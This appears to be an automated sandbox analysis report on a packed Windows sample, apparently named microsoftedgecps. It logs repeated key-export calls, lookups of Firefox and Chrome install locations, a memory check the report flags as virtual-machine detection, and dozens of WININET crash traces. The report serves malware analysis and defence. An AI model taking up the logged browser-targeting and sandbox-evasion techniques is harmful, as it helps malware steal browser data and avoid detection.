CryptExportKey June 29, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003a1308 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 29, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0030a738 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 29, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0030af78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 29, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0030af78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 29, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0030af78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 29, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0030b138 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 29, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0030b138 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 29, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0030b138 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 29, 2021, 1:50 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0030b138 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Tries to locate where the browsers are installed (2 events)

file	C:\Program Files (x86)\Mozilla Firefox\nss3.dll
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx June 29, 2021, 1:50 p.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 event)

section

.code

The executable uses a known packer (1 event)

packer

PureBasic 4.x -> Neil Hodgson

One or more processes crashed (50 out of 124 events)

Time & API	Arguments	Status
__exception__ June 29, 2021, 1:50 p.m.	stacktrace: New_wininet_InternetSetOptionA@16+0x91 New_wininet_InternetSetStatusCallback@8-0x6a @ 0x73d9a889 InternetSetOptionW+0xe0 InternetQueryOptionW-0x54 wininet+0x3536a @ 0x7514536a microsoftedgecps+0x88c6 @ 0x4088c6 exception.instruction_r: 8b 1b 89 5d 98 c7 45 fc fe ff ff ff 85 c9 0f 85 exception.symbol: InternetOpenA+0x731 InternetCrackUrlA-0x2565 wininet+0x1dd19 exception.instruction: mov ebx, dword ptr [ebx] exception.module: WININET.dll exception.exception_code: 0xc0000005 exception.offset: 122137 exception.address: 0x7512dd19 registers.esp: 1637344 registers.edi: 0 registers.eax: 1 registers.ebp: 1637592 registers.edx: 0 registers.ebx: 1000 registers.esi: 2 registers.ecx: 2956408	1
__exception__ June 29, 2021, 1:50 p.m.	stacktrace: New_wininet_InternetSetOptionA@16+0x91 New_wininet_InternetSetStatusCallback@8-0x6a @ 0x73d9a889 InternetSetOptionW+0xe0 InternetQueryOptionW-0x54 wininet+0x3536a @ 0x7514536a microsoftedgecps+0x88c6 @ 0x4088c6 exception.instruction_r: 8b 1b 89 5d 98 c7 45 fc fe ff ff ff 85 c9 0f 85 exception.symbol: InternetOpenA+0x731 InternetCrackUrlA-0x2565 wininet+0x1dd19 exception.instruction: mov ebx, dword ptr [ebx] exception.module: WININET.dll exception.exception_code: 0xc0000005 exception.offset: 122137 exception.address: 0x7512dd19 registers.esp: 1637384 registers.edi: 0 registers.eax: 1 registers.ebp: 1637632 registers.edx: 0 registers.ebx: 1000 registers.esi: 2 registers.ecx: 3050216	1
__exception__ June 29, 2021, 1:50 p.m.	stacktrace: New_wininet_InternetSetOptionA@16+0x91 New_wininet_InternetSetStatusCallback@8-0x6a @ 0x73d9a889 InternetSetOptionW+0xe0 InternetQueryOptionW-0x54 wininet+0x3536a @ 0x7514536a microsoftedgecps+0x88c6 @ 0x4088c6 exception.instruction_r: 8b 1b 89 5d 98 c7 45 fc fe ff ff ff 85 c9 0f 85 exception.symbol: InternetOpenA+0x731 InternetCrackUrlA-0x2565 wininet+0x1dd19 exception.instruction: mov ebx, dword ptr [ebx] exception.module: WININET.dll exception.exception_code: 0xc0000005 exception.offset: 122137 exception.address: 0x7512dd19 registers.esp: 1637288 registers.edi: 0 registers.eax: 1 registers.ebp: 1637536 registers.edx: 0 registers.ebx: 1000 registers.esi: 2 registers.ecx: 3014208	1
__exception__ June 29, 2021, 1:50 p.m.	stacktrace: New_wininet_InternetSetOptionA@16+0x91 New_wininet_InternetSetStatusCallback@8-0x6a @ 0x73d9a889 InternetSetOptionW+0xe0 InternetQueryOptionW-0x54 wininet+0x3536a @ 0x7514536a microsoftedgecps+0x88c6 @ 0x4088c6 exception.instruction_r: 8b 1b 89 5d 98 c7 45 fc fe ff ff ff 85 c9 0f 85 exception.symbol: InternetOpenA+0x731 InternetCrackUrlA-0x2565 wininet+0x1dd19 exception.instruction: mov ebx, dword ptr [ebx] exception.module: WININET.dll exception.exception_code: 0xc0000005 exception.offset: 122137 exception.address: 0x7512dd19 registers.esp: 1637320 registers.edi: 0 registers.eax: 1 registers.ebp: 1637568 registers.edx: 0 registers.ebx: 1000 registers.esi: 2 registers.ecx: 3014208	1
__exception__ June 29, 2021, 1:50 p.m.	stacktrace: New_wininet_InternetSetOptionA@16+0x91 New_wininet_InternetSetStatusCallback@8-0x6a @ 0x73d9a889 InternetSetOptionW+0xe0 InternetQueryOptionW-0x54 wininet+0x3536a @ 0x7514536a microsoftedgecps+0x88c6 @ 0x4088c6 exception.instruction_r: 8b 1b 89 5d 98 c7 45 fc fe ff ff ff 85 c9 0f 85 exception.symbol: InternetOpenA+0x731 InternetCrackUrlA-0x2565 wininet+0x1dd19 exception.instruction: mov ebx, dword ptr [ebx] exception.module: WININET.dll exception.exception_code: 0xc0000005 exception.offset: 122137 exception.address: 0x7512dd19 registers.esp: 1637320 registers.edi: 0 registers.eax: 1 registers.ebp: 1637568 registers.edx: 0 registers.ebx: 1000 registers.esi: 2 registers.ecx: 3014208	1
__exception__ June 29, 2021, 1:50 p.m.	stacktrace: New_wininet_InternetSetOptionA@16+0x91 New_wininet_InternetSetStatusCallback@8-0x6a @ 0x73d9a889 InternetSetOptionW+0xe0 InternetQueryOptionW-0x54 wininet+0x3536a @ 0x7514536a microsoftedgecps+0x88c6 @ 0x4088c6 exception.instruction_r: 8b 1b 89 5d 98 c7 45 fc fe ff ff ff 85 c9 0f 85 exception.symbol: InternetOpenA+0x731 InternetCrackUrlA-0x2565 wininet+0x1dd19 exception.instruction: mov ebx, dword ptr [ebx] exception.module: WININET.dll exception.exception_code: 0xc0000005 exception.offset: 122137 exception.address: 0x7512dd19 registers.esp: 1637304 registers.edi: 0 registers.eax: 1 registers.ebp: 1637552 registers.edx: 0 registers.ebx: 1000 registers.esi: 2 registers.ecx: 3014208	1
__exception__ June 29, 2021, 1:50 p.m.	stacktrace: New_wininet_InternetSetOptionA@16+0x91 New_wininet_InternetSetStatusCallback@8-0x6a @ 0x73d9a889 InternetSetOptionW+0xe0 InternetQueryOptionW-0x54 wininet+0x3536a @ 0x7514536a microsoftedgecps+0x88c6 @ 0x4088c6 exception.instruction_r: 8b 1b 89 5d 98 c7 45 fc fe ff ff ff 85 c9 0f 85 exception.symbol: InternetOpenA+0x731 InternetCrackUrlA-0x2565 wininet+0x1dd19 exception.instruction: mov ebx, dword ptr [ebx] exception.module: WININET.dll exception.exception_code: 0xc0000005 exception.offset: 122137 exception.address: 0x7512dd19 registers.esp: 1637320 registers.edi: 0 registers.eax: 1 registers.ebp: 1637568 registers.edx: 0 registers.ebx: 1000 registers.esi: 2 registers.ecx: 3014208	1
__exception__ June 29, 2021, 1:50 p.m.	stacktrace: New_wininet_InternetSetOptionA@16+0x91 New_wininet_InternetSetStatusCallback@8-0x6a @ 0x73d9a889 InternetSetOptionW+0xe0 InternetQueryOptionW-0x54 wininet+0x3536a @ 0x7514536a microsoftedgecps+0x88c6 @ 0x4088c6 exception.instruction_r: 8b 1b 89 5d 98 c7 45 fc fe ff ff ff 85 c9 0f 85 exception.symbol: InternetOpenA+0x731 InternetCrackUrlA-0x2565 wininet+0x1dd19 exception.instruction: mov ebx, dword ptr [ebx] exception.module: WININET.dll exception.exception_code: 0xc0000005 exception.offset: 122137 exception.address: 0x7512dd19 registers.esp: 1637304 registers.edi: 0 registers.eax: 1 registers.ebp: 1637552 registers.edx: 0 registers.ebx: 1000 registers.esi: 2 registers.ecx: 3014208	1
__exception__ June 29, 2021, 1:50 p.m.	stacktrace: New_wininet_InternetSetOptionA@16+0x91 New_wininet_InternetSetStatusCallback@8-0x6a @ 0x73d9a889 InternetSetOptionW+0xe0 InternetQueryOptionW-0x54 wininet+0x3536a @ 0x7514536a microsoftedgecps+0x88c6 @ 0x4088c6 exception.instruction_r: 8b 1b 89 5d 98 c7 45 fc fe ff ff ff 85 c9 0f 85 exception.symbol: InternetOpenA+0x731 InternetCrackUrlA-0x2565 wininet+0x1dd19 exception.instruction: mov ebx, dword ptr [ebx] exception.module: WININET.dll exception.exception_code: 0xc0000005 exception.offset: 122137 exception.address: 0x7512dd19 registers.esp: 1637320 registers.edi: 0 registers.eax: 1 registers.ebp: 1637568 registers.edx: 0 registers.ebx: 1000 registers.esi: 2 registers.ecx: 3014208	1
__exception__ June 29, 2021, 1:50 p.m.	stacktrace: New_wininet_InternetSetOptionA@16+0x91 New_wininet_InternetSetStatusCallback@8-0x6a @ 0x73d9a889 InternetSetOptionW+0xe0 InternetQueryOptionW-0x54 wininet+0x3536a @ 0x7514536a microsoftedgecps+0x88c6 @ 0x4088c6 exception.instruction_r: 8b 1b 89 5d 98 c7 45 fc fe ff ff ff 85 c9 0f 85 exception.symbol: InternetOpenA+0x731 InternetCrackUrlA-0x2565 wininet+0x1dd19 exception.instruction: mov ebx, dword ptr [ebx] exception.module: WININET.dll exception.exception_code: 0xc0000005 exception.offset: 122137 exception.address: 0x7512dd19 registers.esp: 1637304 registers.edi: 0 registers.eax: 1 registers.ebp: 1637552 registers.edx: 0 registers.ebx: 1000 registers.esi: 2 registers.ecx: 3014208	1
__exception__ June 29, 2021, 1:50 p.m.	stacktrace: New_wininet_InternetSetOptionA@16+0x91 New_wininet_InternetSetStatusCallback@8-0x6a @ 0x73d9a889 InternetSetOptionW+0xe0 InternetQueryOptionW-0x54 wininet+0x3536a @ 0x7514536a microsoftedgecps+0x88c6 @ 0x4088c6 exception.instruction_r: 8b 1b 89 5d 98 c7 45 fc fe ff ff ff 85 c9 0f 85 exception.symbol: InternetOpenA+0x731 InternetCrackUrlA-0x2565 wininet+0x1dd19 exception.instruction: mov ebx, dword ptr [ebx] exception.module: WININET.dll exception.exception_code: 0xc0000005 exception.offset: 122137 exception.address: 0x7512dd19 registers.esp: 1637320 registers.edi: 0 registers.eax: 1 registers.ebp: 1637568 registers.edx: 0 registers.ebx: 1000 registers.esi: 2 registers.ecx: 3381040	1
__exception__ June 29, 2021, 1:50 p.m.	stacktrace: New_wininet_InternetSetOptionA@16+0x91 New_wininet_InternetSetStatusCallback@8-0x6a @ 0x73d9a889 InternetSetOptionW+0xe0 InternetQueryOptionW-0x54 wininet+0x3536a @ 0x7514536a microsoftedgecps+0x88c6 @ 0x4088c6 exception.instruction_r: 8b 1b 89 5d 98 c7 45 fc fe ff ff ff 85 c9 0f 85 exception.symbol: InternetOpenA+0x731 InternetCrackUrlA-0x2565 wininet+0x1dd19 exception.instruction: mov ebx, dword ptr [ebx] exception.module: WININET.dll exception.exception_code: 0xc0000005 exception.offset: 122137 exception.address: 0x7512dd19 registers.esp: 1637304 registers.edi: 0 registers.eax: 1 registers.ebp: 1637552 registers.edx: 0 registers.ebx: 1000 registers.esi: 2 registers.ecx: 3381040	1
__exception__ June 29, 2021, 1:50 p.m.	stacktrace: New_wininet_InternetSetOptionA@16+0x91 New_wininet_InternetSetStatusCallback@8-0x6a @ 0x73d9a889 InternetSetOptionW+0xe0 InternetQueryOptionW-0x54 wininet+0x3536a @ 0x7514536a microsoftedgecps+0x88c6 @ 0x4088c6 exception.instruction_r: 8b 1b 89 5d 98 c7 45 fc fe ff ff ff 85 c9 0f 85 exception.symbol: InternetOpenA+0x731 InternetCrackUrlA-0x2565 wininet+0x1dd19 exception.instruction: mov ebx, dword ptr [ebx] exception.module: WININET.dll exception.exception_code: 0xc0000005 exception.offset: 122137 exception.address: 0x7512dd19 registers.esp: 1637352 registers.edi: 0 registers.eax: 1 registers.ebp: 1637600 registers.edx: 0 registers.ebx: 1000 registers.esi: 2 registers.ecx: 3381040	1
__exception__ June 29, 2021, 1:50 p.m.	stacktrace: New_wininet_InternetSetOptionA@16+0x91 New_wininet_InternetSetStatusCallback@8-0x6a @ 0x73d9a889 InternetSetOptionW+0xe0 InternetQueryOptionW-0x54 wininet+0x3536a @ 0x7514536a microsoftedgecps+0x88c6 @ 0x4088c6 exception.instruction_r: 8b 1b 89 5d 98 c7 45 fc fe ff ff ff 85 c9 0f 85 exception.symbol: InternetOpenA+0x731 InternetCrackUrlA-0x2565 wininet+0x1dd19 exception.instruction: mov ebx, dword ptr [ebx] exception.module: WININET.dll exception.exception_code: 0xc0000005 exception.offset: 122137 exception.address: 0x7512dd19 registers.esp: 1637292 registers.edi: 0 registers.eax: 1 registers.ebp: 1637540 registers.edx: 0 registers.ebx: 1000 registers.esi: 2 registers.ecx: 3381040	1
__exception__ June 29, 2021, 1:50 p.m.	stacktrace: New_wininet_InternetSetOptionA@16+0x91 New_wininet_InternetSetStatusCallback@8-0x6a @ 0x73d9a889 InternetSetOptionW+0xe0 InternetQueryOptionW-0x54 wininet+0x3536a @ 0x7514536a microsoftedgecps+0x88c6 @ 0x4088c6 exception.instruction_r: 8b 1b 89 5d 98 c7 45 fc fe ff ff ff 85 c9 0f 85 exception.symbol: InternetOpenA+0x731 InternetCrackUrlA-0x2565 wininet+0x1dd19 exception.instruction: mov ebx, dword ptr [ebx] exception.module: WININET.dll exception.exception_code: 0xc0000005 exception.offset: 122137 exception.address: 0x7512dd19 registers.esp: 1637276 registers.edi: 0 registers.eax: 1 registers.ebp: 1637524 registers.edx: 0 registers.ebx: 1000 registers.esi: 2 registers.ecx: 3381040	1
__exception__ June 29, 2021, 1:50 p.m.	stacktrace: New_wininet_InternetSetOptionA@16+0x91 New_wininet_InternetSetStatusCallback@8-0x6a @ 0x73d9a889 InternetSetOptionW+0xe0 InternetQueryOptionW-0x54 wininet+0x3536a @ 0x7514536a microsoftedgecps+0x88c6 @ 0x4088c6 exception.instruction_r: 8b 1b 89 5d 98 c7 45 fc fe ff ff ff 85 c9 0f 85 exception.symbol: InternetOpenA+0x731 InternetCrackUrlA-0x2565 wininet+0x1dd19 exception.instruction: mov ebx, dword ptr [ebx] exception.module: WININET.dll exception.exception_code: 0xc0000005 exception.offset: 122137 exception.address: 0x7512dd19 registers.esp: 1637292 registers.edi: 0 registers.eax: 1 registers.ebp: 1637540 registers.edx: 0 registers.ebx: 1000 registers.esi: 2 registers.ecx: 3381040	1
__exception__ June 29, 2021, 1:50 p.m.	stacktrace: New_wininet_InternetSetOptionA@16+0x91 New_wininet_InternetSetStatusCallback@8-0x6a @ 0x73d9a889 InternetSetOptionW+0xe0 InternetQueryOptionW-0x54 wininet+0x3536a @ 0x7514536a microsoftedgecps+0x88c6 @ 0x4088c6 exception.instruction_r: 8b 1b 89 5d 98 c7 45 fc fe ff ff ff 85 c9 0f 85 exception.symbol: InternetOpenA+0x731 InternetCrackUrlA-0x2565 wininet+0x1dd19 exception.instruction: mov ebx, dword ptr [ebx] exception.module: WININET.dll exception.exception_code: 0xc0000005 exception.offset: 122137 exception.address: 0x7512dd19 registers.esp: 1637292 registers.edi: 0 registers.eax: 1 registers.ebp: 1637540 registers.edx: 0 registers.ebx: 1000 registers.esi: 2 registers.ecx: 3420160	1
__exception__ June 29, 2021, 1:50 p.m.	stacktrace: New_wininet_InternetSetOptionA@16+0x91 New_wininet_InternetSetStatusCallback@8-0x6a @ 0x73d9a889 InternetSetOptionW+0xe0 InternetQueryOptionW-0x54 wininet+0x3536a @ 0x7514536a microsoftedgecps+0x88c6 @ 0x4088c6 exception.instruction_r: 8b 1b 89 5d 98 c7 45 fc fe ff ff ff 85 c9 0f 85 exception.symbol: InternetOpenA+0x731 InternetCrackUrlA-0x2565 wininet+0x1dd19 exception.instruction: mov ebx, dword ptr [ebx] exception.module: WININET.dll exception.exception_code: 0xc0000005 exception.offset: 122137 exception.address: 0x7512dd19 registers.esp: 1637276 registers.edi: 0 registers.eax: 1 registers.ebp: 1637524 registers.edx: 0 registers.ebx: 1000 registers.esi: 2 registers.ecx: 3420160	1
__exception__ June 29, 2021, 1:50 p.m.	stacktrace: New_wininet_InternetSetOptionA@16+0x91 New_wininet_InternetSetStatusCallback@8-0x6a @ 0x73d9a889 InternetSetOptionW+0xe0 InternetQueryOptionW-0x54 wininet+0x3536a @ 0x7514536a microsoftedgecps+0x88c6 @ 0x4088c6 exception.instruction_r: 8b 1b 89 5d 98 c7 45 fc fe ff ff ff 85 c9 0f 85 exception.symbol: InternetOpenA+0x731 InternetCrackUrlA-0x2565 wininet+0x1dd19 exception.instruction: mov ebx, dword ptr [ebx] exception.module: WININET.dll exception.exception_code: 0xc0000005 exception.offset: 122137 exception.address: 0x7512dd19 registers.esp: 1637292 registers.edi: 0 registers.eax: 1 registers.ebp: 1637540 registers.edx: 0 registers.ebx: 1000 registers.esi: 2 registers.ecx: 3420160	1
__exception__ June 29, 2021, 1:50 p.m.	stacktrace: New_wininet_InternetSetOptionA@16+0x91 New_wininet_InternetSetStatusCallback@8-0x6a @ 0x73d9a889 InternetSetOptionW+0xe0 InternetQueryOptionW-0x54 wininet+0x3536a @ 0x7514536a microsoftedgecps+0x88c6 @ 0x4088c6 exception.instruction_r: 8b 1b 89 5d 98 c7 45 fc fe ff ff ff 85 c9 0f 85 exception.symbol: InternetOpenA+0x731 InternetCrackUrlA-0x2565 wininet+0x1dd19 exception.instruction: mov ebx, dword ptr [ebx] exception.module: WININET.dll exception.exception_code: 0xc0000005 exception.offset: 122137 exception.address: 0x7512dd19 registers.esp: 1637292 registers.edi: 0 registers.eax: 1 registers.ebp: 1637540 registers.edx: 0 registers.ebx: 1000 registers.esi: 2 registers.ecx: 3420160	1
__exception__ June 29, 2021, 1:50 p.m.	stacktrace: New_wininet_InternetSetOptionA@16+0x91 New_wininet_InternetSetStatusCallback@8-0x6a @ 0x73d9a889 InternetSetOptionW+0xe0 InternetQueryOptionW-0x54 wininet+0x3536a @ 0x7514536a microsoftedgecps+0x88c6 @ 0x4088c6 exception.instruction_r: 8b 1b 89 5d 98 c7 45 fc fe ff ff ff 85 c9 0f 85 exception.symbol: InternetOpenA+0x731 InternetCrackUrlA-0x2565 wininet+0x1dd19 exception.instruction: mov ebx, dword ptr [ebx] exception.module: WININET.dll exception.exception_code: 0xc0000005 exception.offset: 122137 exception.address: 0x7512dd19 registers.esp: 1637276 registers.edi: 0 registers.eax: 1 registers.ebp: 1637524 registers.edx: 0 registers.ebx: 1000 registers.esi: 2 registers.ecx: 3420160	1
__exception__ June 29, 2021, 1:50 p.m.	stacktrace: New_wininet_InternetSetOptionA@16+0x91 New_wininet_InternetSetStatusCallback@8-0x6a @ 0x73d9a889 InternetSetOptionW+0xe0 InternetQueryOptionW-0x54 wininet+0x3536a @ 0x7514536a microsoftedgecps+0x88c6 @ 0x4088c6 exception.instruction_r: 8b 1b 89 5d 98 c7 45 fc fe ff ff ff 85 c9 0f 85 exception.symbol: InternetOpenA+0x731 InternetCrackUrlA-0x2565 wininet+0x1dd19 exception.instruction: mov ebx, dword ptr [ebx] exception.module: WININET.dll exception.exception_code: 0xc0000005 exception.offset: 122137 exception.address: 0x7512dd19 registers.esp: 1637292 registers.edi: 0 registers.eax: 1 registers.ebp: 1637540 registers.edx: 0 registers.ebx: 1000 registers.esi: 2 registers.ecx: 3420160	1
__exception__ June 29, 2021, 1:50 p.m.	stacktrace: New_wininet_InternetSetOptionA@16+0x91 New_wininet_InternetSetStatusCallback@8-0x6a @ 0x73d9a889 InternetSetOptionW+0xe0 InternetQueryOptionW-0x54 wininet+0x3536a @ 0x7514536a microsoftedgecps+0x88c6 @ 0x4088c6 exception.instruction_r: 8b 1b 89 5d 98 c7 45 fc fe ff ff ff 85 c9 0f 85 exception.symbol: InternetOpenA+0x731 InternetCrackUrlA-0x2565 wininet+0x1dd19 exception.instruction: mov ebx, dword ptr [ebx] exception.module: WININET.dll exception.exception_code: 0xc0000005 exception.offset: 122137 exception.address: 0x7512dd19 registers.esp: 1637292 registers.edi: 0 registers.eax: 1 registers.ebp: 1637540 registers.edx: 0 registers.ebx: 1000 registers.esi: 2 registers.ecx: 3420160	1
__exception__ June 29, 2021, 1:50 p.m.	stacktrace: New_wininet_InternetSetOptionA@16+0x91 New_wininet_InternetSetStatusCallback@8-0x6a @ 0x73d9a889 InternetSetOptionW+0xe0 InternetQueryOptionW-0x54 wininet+0x3536a @ 0x7514536a microsoftedgecps+0x88c6 @ 0x4088c6 exception.instruction_r: 8b 1b 89 5d 98 c7 45 fc fe ff ff ff 85 c9 0f 85 exception.symbol: InternetOpenA+0x731 InternetCrackUrlA-0x2565 wininet+0x1dd19 exception.instruction: mov ebx, dword ptr [ebx] exception.module: WININET.dll exception.exception_code: 0xc0000005 exception.offset: 122137 exception.address: 0x7512dd19 registers.esp: 1637276 registers.edi: 0 registers.eax: 1 registers.ebp: 1637524 registers.edx: 0 registers.ebx: 1000 registers.esi: 2 registers.ecx: 3420160	1
__exception__ June 29, 2021, 1:50 p.m.	stacktrace: New_wininet_InternetSetOptionA@16+0x91 New_wininet_InternetSetStatusCallback@8-0x6a @ 0x73d9a889 InternetSetOptionW+0xe0 InternetQueryOptionW-0x54 wininet+0x3536a @ 0x7514536a microsoftedgecps+0x88c6 @ 0x4088c6 exception.instruction_r: 8b 1b 89 5d 98 c7 45 fc fe ff ff ff 85 c9 0f 85 exception.symbol: InternetOpenA+0x731 InternetCrackUrlA-0x2565 wininet+0x1dd19 exception.instruction: mov ebx, dword ptr [ebx] exception.module: WININET.dll exception.exception_code: 0xc0000005 exception.offset: 122137 exception.address: 0x7512dd19 registers.esp: 1637292 registers.edi: 0 registers.eax: 1 registers.ebp: 1637540 registers.edx: 0 registers.ebx: 1000 registers.esi: 2 registers.ecx: 3420160	1
__exception__ June 29, 2021, 1:50 p.m.	stacktrace: New_wininet_InternetSetOptionA@16+0x91 New_wininet_InternetSetStatusCallback@8-0x6a @ 0x73d9a889 InternetSetOptionW+0xe0 InternetQueryOptionW-0x54 wininet+0x3536a @ 0x7514536a microsoftedgecps+0x88c6 @ 0x4088c6 exception.instruction_r: 8b 1b 89 5d 98 c7 45 fc fe ff ff ff 85 c9 0f 85 exception.symbol: InternetOpenA+0x731 InternetCrackUrlA-0x2565 wininet+0x1dd19 exception.instruction: mov ebx, dword ptr [ebx] exception.module: WININET.dll exception.exception_code: 0xc0000005 exception.offset: 122137 exception.address: 0x7512dd19 registers.esp: 1637292 registers.edi: 0 registers.eax: 1 registers.ebp: 1637540 registers.edx: 0 registers.ebx: 1000 registers.esi: 2 registers.ecx: 3420160	1
__exception__ June 29, 2021, 1:50 p.m.	stacktrace: New_wininet_InternetSetOptionA@16+0x91 New_wininet_InternetSetStatusCallback@8-0x6a @ 0x73d9a889 InternetSetOptionW+0xe0 InternetQueryOptionW-0x54 wininet+0x3536a @ 0x7514536a microsoftedgecps+0x88c6 @ 0x4088c6 exception.instruction_r: 8b 1b 89 5d 98 c7 45 fc fe ff ff ff 85 c9 0f 85 exception.symbol: InternetOpenA+0x731 InternetCrackUrlA-0x2565 wininet+0x1dd19 exception.instruction: mov ebx, dword ptr [ebx] exception.module: WININET.dll exception.exception_code: 0xc0000005 exception.offset: 122137 exception.address: 0x7512dd19 registers.esp: 1637352 registers.edi: 0 registers.eax: 1 registers.ebp: 1637600 registers.edx: 0 registers.ebx: 1000 registers.esi: 2 registers.ecx: 3420160	1
__exception__ June 29, 2021, 1:50 p.m.	stacktrace: New_wininet_InternetSetOptionA@16+0x91 New_wininet_InternetSetStatusCallback@8-0x6a @ 0x73d9a889 InternetSetOptionW+0xe0 InternetQueryOptionW-0x54 wininet+0x3536a @ 0x7514536a microsoftedgecps+0x88c6 @ 0x4088c6 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 1b 89 5d 98 c7 45 fc fe ff ff ff 85 c9 0f 85 exception.symbol: InternetOpenA+0x731 InternetCrackUrlA-0x2565 wininet+0x1dd19 exception.instruction: mov ebx, dword ptr [ebx] exception.module: WININET.dll exception.exception_code: 0xc0000005 exception.offset: 122137 exception.address: 0x7512dd19 registers.esp: 77397008 registers.edi: 0 registers.eax: 1 registers.ebp: 77397256 registers.edx: 0 registers.ebx: 1000 registers.esi: 2 registers.ecx: 3420160	1
__exception__ June 29, 2021, 1:50 p.m.	stacktrace: New_wininet_InternetSetOptionA@16+0x91 New_wininet_InternetSetStatusCallback@8-0x6a @ 0x73d9a889 InternetSetOptionW+0xe0 InternetQueryOptionW-0x54 wininet+0x3536a @ 0x7514536a microsoftedgecps+0x88c6 @ 0x4088c6 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 1b 89 5d 98 c7 45 fc fe ff ff ff 85 c9 0f 85 exception.symbol: InternetOpenA+0x731 InternetCrackUrlA-0x2565 wininet+0x1dd19 exception.instruction: mov ebx, dword ptr [ebx] exception.module: WININET.dll exception.exception_code: 0xc0000005 exception.offset: 122137 exception.address: 0x7512dd19 registers.esp: 79494128 registers.edi: 0 registers.eax: 1 registers.ebp: 79494376 registers.edx: 0 registers.ebx: 1000 registers.esi: 2 registers.ecx: 3420520	1
__exception__ June 29, 2021, 1:50 p.m.	stacktrace: New_wininet_InternetSetOptionA@16+0x91 New_wininet_InternetSetStatusCallback@8-0x6a @ 0x73d9a889 InternetSetOptionW+0xe0 InternetQueryOptionW-0x54 wininet+0x3536a @ 0x7514536a microsoftedgecps+0x88c6 @ 0x4088c6 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 1b 89 5d 98 c7 45 fc fe ff ff ff 85 c9 0f 85 exception.symbol: InternetOpenA+0x731 InternetCrackUrlA-0x2565 wininet+0x1dd19 exception.instruction: mov ebx, dword ptr [ebx] exception.module: WININET.dll exception.exception_code: 0xc0000005 exception.offset: 122137 exception.address: 0x7512dd19 registers.esp: 62913548 registers.edi: 0 registers.eax: 1 registers.ebp: 62913796 registers.edx: 0 registers.ebx: 1000 registers.esi: 2 registers.ecx: 3420520	1
__exception__ June 29, 2021, 1:50 p.m.	stacktrace: New_wininet_InternetSetOptionA@16+0x91 New_wininet_InternetSetStatusCallback@8-0x6a @ 0x73d9a889 InternetSetOptionW+0xe0 InternetQueryOptionW-0x54 wininet+0x3536a @ 0x7514536a microsoftedgecps+0x88c6 @ 0x4088c6 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 1b 89 5d 98 c7 45 fc fe ff ff ff 85 c9 0f 85 exception.symbol: InternetOpenA+0x731 InternetCrackUrlA-0x2565 wininet+0x1dd19 exception.instruction: mov ebx, dword ptr [ebx] exception.module: WININET.dll exception.exception_code: 0xc0000005 exception.offset: 122137 exception.address: 0x7512dd19 registers.esp: 78445424 registers.edi: 0 registers.eax: 1 registers.ebp: 78445672 registers.edx: 0 registers.ebx: 1000 registers.esi: 2 registers.ecx: 3420160	1
__exception__ June 29, 2021, 1:50 p.m.	stacktrace: New_wininet_InternetSetOptionA@16+0x91 New_wininet_InternetSetStatusCallback@8-0x6a @ 0x73d9a889 InternetSetOptionW+0xe0 InternetQueryOptionW-0x54 wininet+0x3536a @ 0x7514536a microsoftedgecps+0x88c6 @ 0x4088c6 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 1b 89 5d 98 c7 45 fc fe ff ff ff 85 c9 0f 85 exception.symbol: InternetOpenA+0x731 InternetCrackUrlA-0x2565 wininet+0x1dd19 exception.instruction: mov ebx, dword ptr [ebx] exception.module: WININET.dll exception.exception_code: 0xc0000005 exception.offset: 122137 exception.address: 0x7512dd19 registers.esp: 62913328 registers.edi: 0 registers.eax: 1 registers.ebp: 62913576 registers.edx: 0 registers.ebx: 1000 registers.esi: 2 registers.ecx: 3420520	1
